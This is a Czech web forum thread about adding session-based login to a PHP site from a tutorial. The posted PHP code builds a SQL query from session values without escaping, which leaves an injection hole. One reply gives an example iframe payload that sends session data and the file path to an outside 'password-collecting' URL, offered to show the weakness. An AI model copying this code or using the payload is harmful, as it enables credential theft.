Autor Zpráva
Ultimatus
Profil *
Ahoj.
Potřebuji udělat na svých stránkách registraci a přihlášení .... přihlášení uvidí to co ti ostatní ne...
Ale pouze na jedné stránce celého webu.
postupoval jsem podle tohoto návodu: http://mike.treba.cz/prihlasovani-a-registrace-uzivatelu-pomoci-sessions/
Teď jsem ale na vážkách jak to do dokumentu vložit ... tu tabulku Login odkaz na registrování a odhlášení.
mimochodec
Profil
Čemu říkáš tabulka Login?
Ultimatus
Profil *
mimochodec:
tabulku nazval jsem to blbě, prostě pole login: Kde napíše Nick a password
mimochodec
Profil
Ultimatus:
Dej odkaz na stránku, kdes to vytvořil. Odkaz na návod je fajn, ale jestli máš něco, co ti nefunguje, chtělo by to odkaz na to.
Ultimatus
Profil *
Já jsem to aplikoval několikrát, potom jsem to smazal jelikož nevím jestli tam mám použít tenhle kod:
<?php 
require_once dirname(__FILE__)."/../config.php"; 
 
function unauth_header() { # pouze presmerovani 
    header("Location: ../login.php?code=401", 401); 
    die(); 
} 
 
function check_user() { # kontrola uzivatele 
    if ( isset($_SESSION['jmeno']) && isset($_SESSION['heslo']) && isset($_SESSION['prava']) ) { 
        $select = mysql_query("SELECT `id` FROM `uzivatele` WHERE `jmeno`='{$_SESSION['jmeno']}' AND `heslo`='{$_SESSION['heslo']}'") or die (mysql_error()); 
        $udaje = mysql_fetch_assoc($select); 
        if (mysql_num_rows($select)!=1) { unauth_header(); } 
    } else { 
        unauth_header(); 
    } 
} 
 
check_user(); 
?> 
mimochodec
Profil
Ultimatus:
Asi takhle: na té stránce je použito několik bloků kódu a je tam vysvětleno jak je použít. Ty s tím máš nějaký problém, který ale popisuješ dost mlhavě. Ten kód, cos sem dal, určitě funguje. Pravděpodobně dělá i to, co má dělat. Jestli chceš s něčím poradit, postupuj nejdřív podle toho článku a když něčemu nebudeš rozumět, ptej se. Hlavně bych se ptal autora toho článku a jestli narazíš na něco konkrétního, čemu nerozumíš, ptej se tady.
peta
Profil
 else { 
        //unauth_header(); 
        echo 'Prihlasen '.$udaje['jmeno'].' <a href=?odhlasit>Odhlasit</a>';
    } 
Kdybych ale naboural tvuj kod hodnotou inputu
'<iframe src="http://seznam.cz/sbirej_hesla.php?'.url_encode(implode('/',$_SESSION)).'&'.url_encode(__FILE__).'">'
tak si odeslu prihlaseni a stranku, pro kterou plati na svuj web. Takovy jednoduchy hack.

"Hlavně bych se ptal autora toho článku" To urcite, protoze autor pak muze clanek opravit, aby byl lepe pochopitelnejsi.
Snick
Profil *
Ahoj mám taky problém s tímto článkem.
Hodil jsem si to na web, očekávám že tobude nějak takhle vypadat: http://www.milwaukeetool.cz/int/cz/cz_hdc.nsf/frmHDCIndex?OpenForm
Když hodím kód co ty napsal Ultimatus tak mi to na stránkách napíše: Access denied for user 'root'@'localhost' (using password: NO)
Davex
Profil
Snick:
Asi máš špatně vyplněné přihlašovací údaje k databázi v souboru config.inc.php. A nemusíš se schovávat za jinou přezdívku, protože my víme, že jsi Ultimatus.

Vaše odpověď


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: